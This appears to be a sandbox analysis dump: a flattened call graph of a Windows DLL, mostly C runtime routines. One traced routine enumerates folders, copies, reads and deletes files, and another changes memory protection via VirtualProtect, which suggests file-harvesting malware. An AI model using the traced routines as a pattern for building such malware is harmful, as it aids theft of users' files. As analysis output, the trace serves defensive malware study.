API calls 6398->6401 6399->6398 6402 37869100 6400->6402 6403 3786571e _free 20 API calls 6400->6403 6401->6400 6404 37869112 6402->6404 6406 3786571e _free 20 API calls 6402->6406 6403->6402 6405 37869124 6404->6405 6407 3786571e _free 20 API calls 6404->6407 6408 37869136 6405->6408 6409 3786571e _free 20 API calls 6405->6409 6406->6404 6407->6405 6410 37869148 6408->6410 6411 3786571e _free 20 API calls 6408->6411 6409->6408 6412 3786571e _free 20 API calls 6410->6412 6416 3786915a 6410->6416 6411->6410 6412->6416 6413 3786571e _free 20 API calls 6415 3786916c 6413->6415 6414 3786917e 6418 37869190 6414->6418 6419 3786571e _free 20 API calls 6414->6419 6415->6414 6417 3786571e _free 20 API calls 6415->6417 6416->6413 6416->6415 6417->6414 6420 378691a2 6418->6420 6421 3786571e _free 20 API calls 6418->6421 6419->6418 6422 3786571e _free 20 API calls 6420->6422 6420->6423 6421->6420 6422->6423 6423->6374 6425 378691c5 6424->6425 6435 3786921d 6424->6435 6426 3786571e _free 20 API calls 6425->6426 6428 378691d5 6425->6428 6426->6428 6427 378691e7 6430 378691f9 6427->6430 6432 3786571e _free 20 API calls 6427->6432 6428->6427 6429 3786571e _free 20 API calls 6428->6429 6429->6427 6431 3786920b 6430->6431 6433 3786571e _free 20 API calls 6430->6433 6434 3786571e _free 20 API calls 6431->6434 6431->6435 6432->6430 6433->6431 6434->6435 6435->6375 6437 37867e60 6436->6437 6438 37867e42 6436->6438 6437->6394 6438->6437 6442 3786925d 6438->6442 6441 3786571e _free 20 API calls 6441->6437 6443 37867e5a 6442->6443 6444 3786926e 6442->6444 6443->6441 6445 37869221 __fassign 20 API calls 6444->6445 6446 37869276 6445->6446 6447 37869221 __fassign 20 API calls 6446->6447 6448 37869281 6447->6448 6449 37869221 __fassign 20 API calls 6448->6449 6450 3786928c 6449->6450 6451 37869221 __fassign 20 API calls 6450->6451 6452 37869297 6451->6452 6453 37869221 __fassign 20 API calls 6452->6453 6454 378692a5 6453->6454 6455 3786571e _free 20 API calls 6454->6455 6456 378692b0 6455->6456 6457 3786571e _free 20 API calls 6456->6457 6458 378692bb 6457->6458 6459 3786571e _free 20 API calls 6458->6459 6460 378692c6 6459->6460 6461 37869221 __fassign 20 API calls 6460->6461 6462 378692d4 6461->6462 6463 37869221 __fassign 20 API calls 6462->6463 6464 378692e2 6463->6464 6465 37869221 __fassign 20 API calls 6464->6465 6466 378692f3 6465->6466 6467 37869221 __fassign 20 API calls 6466->6467 6468 37869301 6467->6468 6469 37869221 __fassign 20 API calls 6468->6469 6470 3786930f 6469->6470 6471 3786571e _free 20 API calls 6470->6471 6472 3786931a 6471->6472 6473 3786571e _free 20 API calls 6472->6473 6474 37869325 6473->6474 6475 3786571e _free 20 API calls 6474->6475 6476 37869330 6475->6476 6477 3786571e _free 20 API calls 6476->6477 6477->6443 6478->6367 6480 37866b05 6479->6480 6481 37866baf 6479->6481 6489 378686e4 6480->6489 6483 37862ada _ValidateLocalCookies 5 API calls 6481->6483 6485 37866c5b 6483->6485 6485->6148 6488 37868a3e 43 API calls 6488->6481 6490 378654a7 __fassign 38 API calls 6489->6490 6491 37868704 MultiByteToWideChar 6490->6491 6493 378687da 6491->6493 6494 37868742 6491->6494 6495 37862ada _ValidateLocalCookies 5 API calls 6493->6495 6497 378656d0 21 API calls 6494->6497 6500 37868763 ___scrt_fastfail 6494->6500 6498 37866b66 6495->6498 6496 378687d4 6508 37868801 6496->6508 6497->6500 6503 37868a3e 6498->6503 6500->6496 6501 378687a8 MultiByteToWideChar 6500->6501 6501->6496 6502 378687c4 GetStringTypeW 6501->6502 6502->6496 6504 378654a7 __fassign 38 API calls 6503->6504 6505 37868a51 6504->6505 6512 37868821 6505->6512 6509 3786881e 6508->6509 6510 3786880d 6508->6510 6509->6493 6510->6509 6511 3786571e _free 20 API calls 6510->6511 6511->6509 6513 3786883c 6512->6513 6514 37868862 MultiByteToWideChar 6513->6514 6515 3786888c 6514->6515 6516 37868a16 6514->6516 6521 378656d0 21 API calls 6515->6521 6523 378688ad 6515->6523 6517 37862ada _ValidateLocalCookies 5 API calls 6516->6517 6518 37866b87 6517->6518 6518->6488 6519 378688f6 MultiByteToWideChar 6520 37868962 6519->6520 6522 3786890f 6519->6522 6525 37868801 __freea 20 API calls 6520->6525 6521->6523 6539 37865f19 6522->6539 6523->6519 6523->6520 6525->6516 6527 37868971 6529 378656d0 21 API calls 6527->6529 6533 37868992 6527->6533 6528 37868939 6528->6520 6530 37865f19 11 API calls 6528->6530 6529->6533 6530->6520 6531 37868a07 6532 37868801 __freea 20 API calls 6531->6532 6532->6520 6533->6531 6534 37865f19 11 API calls 6533->6534 6535 378689e6 6534->6535 6535->6531 6536 378689f5 WideCharToMultiByte 6535->6536 6536->6531 6537 37868a35 6536->6537 6538 37868801 __freea 20 API calls 6537->6538 6538->6520 6540 37865c45 _abort 5 API calls 6539->6540 6541 37865f40 6540->6541 6543 37865f49 6541->6543 6547 37865fa1 6541->6547 6545 37862ada _ValidateLocalCookies 5 API calls 6543->6545 6546 37865f9b 6545->6546 6546->6520 6546->6527 6546->6528 6548 37865c45 _abort 5 API calls 6547->6548 6549 37865fc8 6548->6549 6550 37862ada _ValidateLocalCookies 5 API calls 6549->6550 6551 37865f89 LCMapStringW 6550->6551 6551->6543 6553 37866892 ___DestructExceptionObject 6552->6553 6560 37865671 RtlEnterCriticalSection 6553->6560 6555 3786689c 6561 378668f1 6555->6561 6559 378668b5 _abort 6559->6153 6560->6555 6573 37867011 6561->6573 6563 3786693f 6564 37867011 26 API calls 6563->6564 6565 3786695b 6564->6565 6566 37867011 26 API calls 6565->6566 6567 37866979 6566->6567 6568 3786571e _free 20 API calls 6567->6568 6569 378668a9 6567->6569 6568->6569 6570 378668bd 6569->6570 6587 378656b9 RtlLeaveCriticalSection 6570->6587 6572 378668c7 6572->6559 6574 37867022 6573->6574 6583 3786701e 6573->6583 6575 37867029 6574->6575 6579 3786703c ___scrt_fastfail 6574->6579 6576 37866368 __dosmaperr 20 API calls 6575->6576 6577 3786702e 6576->6577 6578 378662ac _abort 26 API calls 6577->6578 6578->6583 6580 37867073 6579->6580 6581 3786706a 6579->6581 6579->6583 6580->6583 6585 37866368 __dosmaperr 20 API calls 6580->6585 6582 37866368 __dosmaperr 20 API calls 6581->6582 6584 3786706f 6582->6584 6583->6563 6586 378662ac _abort 26 API calls 6584->6586 6585->6584 6586->6583 6587->6572 7683 37862049 7684 37862055 ___DestructExceptionObject 7683->7684 7685 378620d3 7684->7685 7686 3786207d 7684->7686 7696 3786205e 7684->7696 7687 37862639 ___scrt_fastfail 4 API calls 7685->7687 7697 3786244c 7686->7697 7689 378620da 7687->7689 7690 37862082 7706 37862308 7690->7706 7692 37862087 __RTC_Initialize 7709 378620c4 7692->7709 7694 3786209f 7712 3786260b 7694->7712 7698 37862451 ___scrt_release_startup_lock 7697->7698 7699 37862455 7698->7699 7702 37862461 7698->7702 7700 3786527a _abort 20 API calls 7699->7700 7701 3786245f 7700->7701 7701->7690 7703 3786246e 7702->7703 7704 3786499b _abort 28 API calls 7702->7704 7703->7690 7705 37864bbd 7704->7705 7705->7690 7718 378634c7 RtlInterlockedFlushSList 7706->7718 7708 37862312 7708->7692 7720 3786246f 7709->7720 7711 378620c9 ___scrt_release_startup_lock 7711->7694 7713 37862617 7712->7713 7714 3786262d 7713->7714 7728 378653ed 7713->7728 7714->7696 7717 37863529 ___vcrt_uninitialize 8 API calls 7717->7714 7719 378634d7 7718->7719 7719->7708 7725 378653ff 7720->7725 7723 3786391b ___vcrt_uninitialize_ptd 6 API calls 7724 3786354d 7723->7724 7724->7711 7726 37865c2b 11 API calls 7725->7726 7727 37862476 7726->7727 7727->7723 7731 378674da 7728->7731 7733 378674f3 7731->7733 7732 37862ada _ValidateLocalCookies 5 API calls 7734 37862625 7732->7734 7733->7732 7734->7717 6686 37864ed7 6687 37866d60 51 API calls 6686->6687 6688 37864ee9 6687->6688 6697 37867153 GetEnvironmentStringsW 6688->6697 6691 37864ef4 6693 3786571e _free 20 API calls 6691->6693 6694 37864f29 6693->6694 6695 37864eff 6696 3786571e _free 20 API calls 6695->6696 6696->6691 6698 3786716a 6697->6698 6708 378671bd 6697->6708 6701 37867170 WideCharToMultiByte 6698->6701 6699 378671c6 FreeEnvironmentStringsW 6700 37864eee 6699->6700 6700->6691 6709 37864f2f 6700->6709 6702 3786718c 6701->6702 6701->6708 6703 378656d0 21 API calls 6702->6703 6704 37867192 6703->6704 6705 378671af 6704->6705 6706 37867199 WideCharToMultiByte 6704->6706 6707 3786571e _free 20 API calls 6705->6707 6706->6705 6707->6708 6708->6699 6708->6700 6710 37864f44 6709->6710 6711 3786637b _abort 20 API calls 6710->6711 6721 37864f6b 6711->6721 6712 37864fcf 6713 3786571e _free 20 API calls 6712->6713 6714 37864fe9 6713->6714 6714->6695 6715 3786637b _abort 20 API calls 6715->6721 6716 37864fd1 6717 37865000 20 API calls 6716->6717 6719 37864fd7 6717->6719 6720 3786571e _free 20 API calls 6719->6720 6720->6712 6721->6712 6721->6715 6721->6716 6722 37864ff3 6721->6722 6724 3786571e _free 20 API calls 6721->6724 6726 3786544d 6721->6726 6723 378662bc _abort 11 API calls 6722->6723 6725 37864fff 6723->6725 6724->6721 6727 3786545a 6726->6727 6728 37865468 6726->6728 6727->6728 6733 3786547f 6727->6733 6729 37866368 __dosmaperr 20 API calls 6728->6729 6730 37865470 6729->6730 6731 378662ac _abort 26 API calls 6730->6731 6732 3786547a 6731->6732 6732->6721 6733->6732 6734 37866368 __dosmaperr 20 API calls 6733->6734 6734->6730 6735 378673d5 6736 378673e1 ___DestructExceptionObject 6735->6736 6747 37865671 RtlEnterCriticalSection 6736->6747 6738 378673e8 6748 37868be3 6738->6748 6740 378673f7 6741 37867406 6740->6741 6761 37867269 GetStartupInfoW 6740->6761 6772 37867422 6741->6772 6745 37867417 _abort 6747->6738 6749 37868bef ___DestructExceptionObject 6748->6749 6750 37868c13 6749->6750 6751 37868bfc 6749->6751 6775 37865671 RtlEnterCriticalSection 6750->6775 6753 37866368 __dosmaperr 20 API calls 6751->6753 6754 37868c01 6753->6754 6755 378662ac _abort 26 API calls 6754->6755 6757 37868c0b _abort 6755->6757 6756 37868c4b 6783 37868c72 6756->6783 6757->6740 6758 37868c1f 6758->6756 6776 37868b34 6758->6776 6762 37867286 6761->6762 6763 37867318 6761->6763 6762->6763 6764 37868be3 27 API calls 6762->6764 6767 3786731f 6763->6767 6765 378672af 6764->6765 6765->6763 6766 378672dd GetFileType 6765->6766 6766->6765 6771 37867326 6767->6771 6768 37867369 GetStdHandle 6768->6771 6769 378673d1 6769->6741 6770 3786737c GetFileType 6770->6771 6771->6768 6771->6769 6771->6770 6787 378656b9 RtlLeaveCriticalSection 6772->6787 6774 37867429 6774->6745 6775->6758 6777 3786637b _abort 20 API calls 6776->6777 6782 37868b46 6777->6782 6778 37868b53 6779 3786571e _free 20 API calls 6778->6779 6781 37868ba5 6779->6781 6780 37865eb7 11 API calls 6780->6782 6781->6758 6782->6778 6782->6780 6786 378656b9 RtlLeaveCriticalSection 6783->6786 6785 37868c79 6785->6757 6786->6785 6787->6774 6588 37863c90 RtlUnwind 6788 378636d0 6789 378636f0 @_EH4_CallFilterFunc@8 6788->6789 6790 378636e2 6788->6790 6791 37862ada _ValidateLocalCookies 5 API calls 6790->6791 6791->6789 7735 37865351 7736 37865360 7735->7736 7740 37865374 7735->7740 7738 3786571e _free 20 API calls 7736->7738 7736->7740 7737 3786571e _free 20 API calls 7739 37865386 7737->7739 7738->7740 7741 3786571e _free 20 API calls 7739->7741 7740->7737 7742 37865399 7741->7742 7743 3786571e _free 20 API calls 7742->7743 7744 378653aa 7743->7744 7745 3786571e _free 20 API calls 7744->7745 7746 378653bb 7745->7746 7113 3786281c 7116 37862882 7113->7116 7119 37863550 7116->7119 7118 3786282a 7120 3786355d 7119->7120 7124 3786358a 7119->7124 7121 378647e5 ___std_exception_copy 21 API calls 7120->7121 7120->7124 7122 3786357a 7121->7122 7123 3786544d ___std_exception_copy 26 API calls 7122->7123 7122->7124 7123->7124 7124->7118 6792 37864bdd 6793 37864bec 6792->6793 6794 37864c08 6792->6794 6793->6794 6796 37864bf2 6793->6796 6795 37866d60 51 API calls 6794->6795 6798 37864c0f GetModuleFileNameA 6795->6798 6797 37866368 __dosmaperr 20 API calls 6796->6797 6799 37864bf7 6797->6799 6800 37864c33 6798->6800 6801 378662ac _abort 26 API calls 6799->6801 6815 37864d01 6800->6815 6802 37864c01 6801->6802 6807 37864c66 6810 37866368 __dosmaperr 20 API calls 6807->6810 6808 37864c72 6809 37864d01 38 API calls 6808->6809 6812 37864c88 6809->6812 6814 37864c6b 6810->6814 6811 3786571e _free 20 API calls 6811->6802 6813 3786571e _free 20 API calls 6812->6813 6812->6814 6813->6814 6814->6811 6817 37864d26 6815->6817 6819 37864d86 6817->6819 6827 378670eb 6817->6827 6818 37864c50 6821 37864e76 6818->6821 6819->6818 6820 378670eb 38 API calls 6819->6820 6820->6819 6822 37864e8b 6821->6822 6823 37864c5d 6821->6823 6822->6823 6824 3786637b _abort 20 API calls 6822->6824 6823->6807 6823->6808 6825 37864eb9 6824->6825 6826 3786571e _free 20 API calls 6825->6826 6826->6823 6830 37867092 6827->6830 6831 378654a7 __fassign 38 API calls 6830->6831 6832 378670a6 6831->6832 6832->6817 6589 37864a9a 6592 37865411 6589->6592 6593 3786541d _abort 6592->6593 6594 37865af6 _abort 38 API calls 6593->6594 6597 37865422 6594->6597 6595 378655a8 _abort 38 API calls 6596 3786544c 6595->6596 6597->6595 5816 37861c5b 5817 37861c6b ___scrt_fastfail 5816->5817 5820 378612ee 5817->5820 5819 37861c87 5821 37861324 ___scrt_fastfail 5820->5821 5822 378613b7 GetEnvironmentVariableW 5821->5822 5846 378610f1 5822->5846 5825 378610f1 57 API calls 5826 37861465 5825->5826 5827 378610f1 57 API calls 5826->5827 5828 37861479 5827->5828 5829 378610f1 57 API calls 5828->5829 5830 3786148d 5829->5830 5831 378610f1 57 API calls 5830->5831 5832 378614a1 5831->5832 5833 378610f1 57 API calls 5832->5833 5834 378614b5 lstrlenW 5833->5834 5835 378614d2 5834->5835 5836 378614d9 lstrlenW 5834->5836 5835->5819 5837 378610f1 57 API calls 5836->5837 5838 37861501 lstrlenW lstrcatW 5837->5838 5839 378610f1 57 API calls 5838->5839 5840 37861539 lstrlenW lstrcatW 5839->5840 5841 378610f1 57 API calls 5840->5841 5842 3786156b lstrlenW lstrcatW 5841->5842 5843 378610f1 57 API calls 5842->5843 5844 3786159d lstrlenW lstrcatW 5843->5844 5845 378610f1 57 API calls 5844->5845 5845->5835 5847 37861118 ___scrt_fastfail 5846->5847 5848 37861129 lstrlenW 5847->5848 5859 37862c40 5848->5859 5851 37861177 lstrlenW FindFirstFileW 5853 378611a0 5851->5853 5854 378611e1 5851->5854 5852 37861168 lstrlenW 5852->5851 5855 378611c7 FindNextFileW 5853->5855 5856 378611aa 5853->5856 5854->5825 5855->5853 5858 378611da FindClose 5855->5858 5856->5855 5861 37861000 5856->5861 5858->5854 5860 37861148 lstrcatW lstrlenW 5859->5860 5860->5851 5860->5852 5862 37861022 ___scrt_fastfail 5861->5862 5863 378610af 5862->5863 5864 3786102f lstrcatW lstrlenW 5862->5864 5865 378610b5 lstrlenW 5863->5865 5876 378610ad 5863->5876 5866 3786105a lstrlenW 5864->5866 5867 3786106b lstrlenW 5864->5867 5892 37861e16 5865->5892 5866->5867 5878 37861e89 lstrlenW 5867->5878 5870 37861088 GetFileAttributesW 5872 3786109c 5870->5872 5870->5876 5871 378610ca 5873 37861e89 5 API calls 5871->5873 5871->5876 5872->5876 5884 3786173a 5872->5884 5875 378610df 5873->5875 5897 378611ea 5875->5897 5876->5856 5879 37862c40 ___scrt_fastfail 5878->5879 5880 37861ea7 lstrcatW lstrlenW 5879->5880 5881 37861ec2 5880->5881 5882 37861ed1 lstrcatW 5880->5882 5881->5882 5883 37861ec7 lstrlenW 5881->5883 5882->5870 5883->5882 5885 37861747 ___scrt_fastfail 5884->5885 5912 37861cca 5885->5912 5888 3786199f 5888->5876 5890 37861824 ___scrt_fastfail _strlen 5890->5888 5932 378615da 5890->5932 5893 37861e29 5892->5893 5896 37861e4c 5892->5896 5894 37861e2d lstrlenW 5893->5894 5893->5896 5895 37861e3f lstrlenW 5894->5895 5894->5896 5895->5896 5896->5871 5898 3786120e ___scrt_fastfail 5897->5898 5899 37861e89 5 API calls 5898->5899 5900 37861220 GetFileAttributesW 5899->5900 5901 37861246 5900->5901 5902 37861235 5900->5902 5903 37861e89 5 API calls 5901->5903 5902->5901 5904 3786173a 35 API calls 5902->5904 5905 37861258 5903->5905 5904->5901 5906 378610f1 56 API calls 5905->5906 5907 3786126d 5906->5907 5908 37861e89 5 API calls 5907->5908 5909 3786127f ___scrt_fastfail 5908->5909 5910 378610f1 56 API calls 5909->5910 5911 378612e6 5910->5911 5911->5876 5913 37861cf1 ___scrt_fastfail 5912->5913 5914 37861d0f CopyFileW CreateFileW 5913->5914 5915 37861d44 DeleteFileW 5914->5915 5916 37861d55 GetFileSize 5914->5916 5921 37861808 5915->5921 5917 37861ede 22 API calls 5916->5917 5918 37861d66 ReadFile 5917->5918 5919 37861d94 CloseHandle DeleteFileW 5918->5919 5920 37861d7d CloseHandle DeleteFileW 5918->5920 5919->5921 5920->5921 5921->5888 5922 37861ede 5921->5922 5924 3786222f 5922->5924 5925 3786224e 5924->5925 5928 37862250 5924->5928 5940 3786474f 5924->5940 5945 378647e5 5924->5945 5925->5890 5927 37862908 5929 378635d2 __CxxThrowException@8 RaiseException 5927->5929 5928->5927 5952 378635d2 5928->5952 5930 37862925 5929->5930 5930->5890 5933 3786160c _strcat _strlen 5932->5933 5934 3786163c lstrlenW 5933->5934 6040 37861c9d 5934->6040 5936 37861655 lstrcatW lstrlenW 5937 37861678 5936->5937 5938 37861693 ___scrt_fastfail 5937->5938 5939 3786167e lstrcatW 5937->5939 5938->5890 5939->5938 5955 37864793 5940->5955 5943 3786478f 5943->5924 5944 37864765 5961 37862ada 5944->5961 5950 378656d0 _abort 5945->5950 5946 3786570e 5974 37866368 5946->5974 5948 378656f9 RtlAllocateHeap 5949 3786570c 5948->5949 5948->5950 5949->5924 5950->5946 5950->5948 5951 3786474f _abort 7 API calls 5950->5951 5951->5950 5954 378635f2 RaiseException 5952->5954 5954->5927 5956 3786479f ___DestructExceptionObject 5955->5956 5968 37865671 RtlEnterCriticalSection 5956->5968 5958 378647aa 5969 378647dc 5958->5969 5960 378647d1 _abort 5960->5944 5962 37862ae5 IsProcessorFeaturePresent 5961->5962 5963 37862ae3 5961->5963 5965 37862b58 5962->5965 5963->5943 5973 37862b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5965->5973 5967 37862c3b 5967->5943 5968->5958 5972 378656b9 RtlLeaveCriticalSection 5969->5972 5971 378647e3 5971->5960 5972->5971 5973->5967 5977 37865b7a GetLastError 5974->5977 5978 37865b93 5977->5978 5979 37865b99 5977->5979 5996 37865e08 5978->5996 5983 37865bf0 SetLastError 5979->5983 6003 3786637b 5979->6003 5984 37865bf9 5983->5984 5984->5949 5988 37865bb9 5992 37865be7 SetLastError 5988->5992 5989 37865bcf 6023 3786593c 5989->6023 5990 37865bb3 6010 3786571e 5990->6010 5992->5984 5994 3786571e _free 17 API calls 5995 37865be0 5994->5995 5995->5983 5995->5992 6028 37865c45 5996->6028 5998 37865e2f 5999 37865e47 TlsGetValue 5998->5999 6000 37865e3b 5998->6000 5999->6000 6001 37862ada _ValidateLocalCookies 5 API calls 6000->6001 6002 37865e58 6001->6002 6002->5979 6008 37866388 _abort 6003->6008 6004 378663c8 6007 37866368 __dosmaperr 19 API calls 6004->6007 6005 378663b3 RtlAllocateHeap 6006 37865bab 6005->6006 6005->6008 6006->5990 6016 37865e5e 6006->6016 6007->6006 6008->6004 6008->6005 6009 3786474f _abort 7 API calls 6008->6009 6009->6008 6011 37865752 __dosmaperr 6010->6011 6012 37865729 HeapFree 6010->6012 6011->5988 6012->6011 6013 3786573e 6012->6013 6014 37866368 __dosmaperr 18 API calls 6013->6014 6015 37865744 GetLastError 6014->6015 6015->6011 6017 37865c45 _abort 5 API calls 6016->6017 6018 37865e85 6017->6018 6019 37865ea0 TlsSetValue 6018->6019 6020 37865e94 6018->6020 6019->6020 6021 37862ada _ValidateLocalCookies 5 API calls 6020->6021 6022 37865bc8 6021->6022 6022->5989 6022->5990 6034 37865914 6023->6034 6029 37865c75 __crt_fast_encode_pointer 6028->6029 6032 37865c71 6028->6032 6029->5998 6030 37865c95 6030->6029 6033 37865ca1 GetProcAddress 6030->6033 6031 37865ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6031->6032 6032->6029 6032->6030 6032->6031 6033->6029 6035 37865854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6034->6035 6036 37865938 6035->6036 6037 378658c4 6036->6037 6038 37865758 _abort 20 API calls 6037->6038 6039 378658e8 6038->6039 6039->5994 6041 37861ca6 _strlen 6040->6041 6041->5936 6833 378620db 6835 378620e7 ___DestructExceptionObject 6833->6835 6834 378620f6 6835->6834 6836 37862110 dllmain_raw 6835->6836 6837 3786210b 6835->6837 6836->6834 6838 3786212a 6836->6838 6837->6834 6840 37862177 6837->6840 6843 37861eec 31 API calls 6837->6843 6846 37861eec 6838->6846 6840->6834 6841 37861eec 31 API calls 6840->6841 6842 3786218a 6841->6842 6842->6834 6844 37862193 dllmain_raw 6842->6844 6845 3786216d dllmain_raw 6843->6845 6844->6834 6845->6840 6847 37861ef7 6846->6847 6848 37861f2a dllmain_crt_process_detach 6846->6848 6849 37861f1c dllmain_crt_process_attach 6847->6849 6850 37861efc 6847->6850 6851 37861f06 6848->6851 6849->6851 6852 37861f12 6850->6852 6853 37861f01 6850->6853 6851->6837 6861 378623ec 6852->6861 6853->6851 6856 3786240b 6853->6856 6869 378653e5 6856->6869 6980 37863513 6861->6980 6864 378623f5 6864->6851 6867 37862408 6867->6851 6868 3786351e 7 API calls 6868->6864 6875 37865aca 6869->6875 6872 3786351e 6951 37863820 6872->6951 6874 37862415 6874->6851 6876 37865ad4 6875->6876 6877 37862410 6875->6877 6878 37865e08 _abort 11 API calls 6876->6878 6877->6872 6879 37865adb 6878->6879 6879->6877 6880 37865e5e _abort 11 API calls 6879->6880 6881 37865aee 6880->6881 6883 378659b5 6881->6883 6884 378659d0 6883->6884 6885 378659c0 6883->6885 6884->6877 6889 378659d6 6885->6889 6888 3786571e _free 20 API calls 6888->6884 6890 378659ef 6889->6890 6891 378659e9 6889->6891 6893 3786571e _free 20 API calls 6890->6893 6892 3786571e _free 20 API calls 6891->6892 6892->6890 6894 378659fb 6893->6894 6895 3786571e _free 20 API calls 6894->6895 6896 37865a06 6895->6896 6897 3786571e _free 20 API calls 6896->6897 6898 37865a11 6897->6898 6899 3786571e _free 20 API calls 6898->6899 6900 37865a1c 6899->6900 6901 3786571e _free 20 API calls 6900->6901 6902 37865a27 6901->6902 6903 3786571e _free 20 API calls 6902->6903 6904 37865a32 6903->6904 6905 3786571e _free 20 API calls 6904->6905 6906 37865a3d 6905->6906 6907 3786571e _free 20 API calls 6906->6907 6908 37865a48 6907->6908 6909 3786571e _free 20 API calls 6908->6909 6910 37865a56 6909->6910 6915 3786589c 6910->6915 6921 378657a8 6915->6921 6917 378658c0 6918 378658ec 6917->6918 6934 37865809 6918->6934 6920 37865910 6920->6888 6922 378657b4 ___DestructExceptionObject 6921->6922 6929 37865671 RtlEnterCriticalSection 6922->6929 6924 378657e8 6930 378657fd 6924->6930 6926 378657be 6926->6924 6928 3786571e _free 20 API calls 6926->6928 6927 378657f5 _abort 6927->6917 6928->6924 6929->6926 6933 378656b9 RtlLeaveCriticalSection 6930->6933 6932 37865807 6932->6927 6933->6932 6935 37865815 ___DestructExceptionObject 6934->6935 6942 37865671 RtlEnterCriticalSection 6935->6942 6937 3786581f 6943 37865a7f 6937->6943 6939 37865832 6947 37865848 6939->6947 6941 37865840 _abort 6941->6920 6942->6937 6944 37865ab5 __fassign 6943->6944 6945 37865a8e __fassign 6943->6945 6944->6939 6945->6944 6946 37867cc2 __fassign 20 API calls 6945->6946 6946->6944 6950 378656b9 RtlLeaveCriticalSection 6947->6950 6949 37865852 6949->6941 6950->6949 6952 3786384b ___vcrt_freefls@4 6951->6952 6953 3786382d 6951->6953 6952->6874 6956 3786383b 6953->6956 6957 37863b67 6953->6957 6962 37863ba2 6956->6962 6967 37863a82 6957->6967 6959 37863b81 6960 37863b99 TlsGetValue 6959->6960 6961 37863b8d 6959->6961 6960->6961 6961->6956 6963 37863a82 try_get_function 5 API calls 6962->6963 6964 37863bbc 6963->6964 6965 37863bd7 TlsSetValue 6964->6965 6966 37863bcb 6964->6966 6965->6966 6966->6952 6968 37863aaa 6967->6968 6972 37863aa6 __crt_fast_encode_pointer 6967->6972 6968->6972 6973 378639be 6968->6973 6971 37863ac4 GetProcAddress 6971->6972 6972->6959 6975 378639cd try_get_first_available_module 6973->6975 6974 378639ea LoadLibraryExW 6974->6975 6976 37863a05 GetLastError 6974->6976 6975->6974 6977 37863a60 FreeLibrary 6975->6977 6978 37863a77 6975->6978 6979 37863a38 LoadLibraryExW 6975->6979 6976->6975 6977->6975 6978->6971 6978->6972 6979->6975 6986 37863856 6980->6986 6982 378623f1 6982->6864 6983 378653da 6982->6983 6984 37865b7a _abort 20 API calls 6983->6984 6985 378623fd 6984->6985 6985->6867 6985->6868 6987 37863862 GetLastError 6986->6987 6988 3786385f 6986->6988 6989 37863b67 ___vcrt_FlsGetValue 6 API calls 6987->6989 6988->6982 6990 37863877 6989->6990 6991 378638dc SetLastError 6990->6991 6992 37863ba2 ___vcrt_FlsSetValue 6 API calls 6990->6992 6997 37863896 6990->6997 6991->6982 6993 37863890 6992->6993 6994 378638b8 6993->6994 6995 37863ba2 ___vcrt_FlsSetValue 6 API calls 6993->6995 6993->6997 6996 37863ba2 ___vcrt_FlsSetValue 6 API calls 6994->6996 6994->6997 6995->6994 6996->6997 6997->6991 7125 37862418 7126 37862420 ___scrt_release_startup_lock 7125->7126 7129 378647f5 7126->7129 7128 37862448 7130 37864804 7129->7130 7131 37864808 7129->7131 7130->7128 7134 37864815 7131->7134 7135 37865b7a _abort 20 API calls 7134->7135 7138 3786482c 7135->7138 7136 37862ada _ValidateLocalCookies 5 API calls 7137 37864811 7136->7137 7137->7128 7138->7136 5784 3786c7a7 5785 3786c7be 5784->5785 5794 3786c82c 5784->5794 5785->5794 5796 3786c7e6 GetModuleHandleA 5785->5796 5787 3786c835 GetModuleHandleA 5789 3786c83f 5787->5789 5788 3786c872 5789->5789 5791 3786c85f GetProcAddress 5789->5791 5789->5794 5790 3786c7dd 5790->5789 5792 3786c800 GetProcAddress 5790->5792 5790->5794 5791->5794 5793 3786c80d VirtualProtect 5792->5793 5792->5794 5793->5794 5795 3786c81c VirtualProtect 5793->5795 5794->5787 5794->5788 5794->5789 5795->5794 5797 3786c7ef 5796->5797 5798 3786c82c 5796->5798 5808 3786c803 GetProcAddress 5797->5808 5801 3786c835 GetModuleHandleA 5798->5801 5802 3786c872 5798->5802 5803 3786c83f 5798->5803 5800 3786c7f4 5800->5798 5804 3786c800 GetProcAddress 5800->5804 5801->5803 5803->5798 5803->5803 5807 3786c85f GetProcAddress 5803->5807 5804->5798 5805 3786c80d VirtualProtect 5804->5805 5805->5798 5806 3786c81c VirtualProtect 5805->5806 5806->5798 5807->5798 5809 3786c82c 5808->5809 5810 3786c80d VirtualProtect 5808->5810 5812 3786c835 GetModuleHandleA 5809->5812 5813 3786c872 5809->5813 5810->5809 5811 3786c81c VirtualProtect 5810->5811 5811->5809 5815 3786c83f 5812->5815 5814 3786c85f GetProcAddress 5814->5815 5815->5809 5815->5814 6598 378681a0 6599 378681d9 6598->6599 6600 378681dd 6599->6600 6611 37868205 6599->6611 6601 37866368 __dosmaperr 20 API calls 6600->6601 6603 378681e2 6601->6603 6602 37868529 6604 37862ada _ValidateLocalCookies 5 API calls 6602->6604 6605 378662ac _abort 26 API calls 6603->6605 6606 37868536 6604->6606 6607 378681ed 6605->6607 6608 37862ada _ValidateLocalCookies 5 API calls 6607->6608 6609 378681f9 6608->6609 6611->6602 6612 378680c0 6611->6612 6615 378680db 6612->6615 6613 37862ada _ValidateLocalCookies 5 API calls 6614 37868152 6613->6614 6614->6611 6615->6613 6998 3786a1e0 7001 3786a1fe 6998->7001 7000 3786a1f6 7005 3786a203 7001->7005 7003 3786a298 7003->7000 7005->7003 7006 3786aa53 7005->7006 7007 3786aa70 RtlDecodePointer 7006->7007 7008 3786aa80 7006->7008 7007->7008 7009 3786ab0d 7008->7009 7012 3786ab02 7008->7012 7014 3786aab7 7008->7014 7009->7012 7013 37866368 __dosmaperr 20 API calls 7009->7013 7010 37862ada _ValidateLocalCookies 5 API calls 7011 3786a42f 7010->7011 7011->7000 7012->7010 7013->7012 7014->7012 7015 37866368 __dosmaperr 20 API calls 7014->7015 7015->7012 7747 37867260 GetStartupInfoW 7748 37867286 7747->7748 7750 37867318 7747->7750 7749 37868be3 27 API calls 7748->7749 7748->7750 7751 378672af 7749->7751 7751->7750 7752 378672dd GetFileType 7751->7752 7752->7751 6616 378621a1 ___scrt_dllmain_exception_filter 7753 37869d61 7754 37869d81 7753->7754 7757 37869db8 7754->7757 7756 37869dab 7758 37869dbf 7757->7758 7759 37869e20 7758->7759 7760 37869ddf 7758->7760 7761 3786aa17 21 API calls 7759->7761 7763 3786a90e 7759->7763 7760->7763 7764 3786aa17 21 API calls 7760->7764 7762 37869e6e 7761->7762 7762->7756 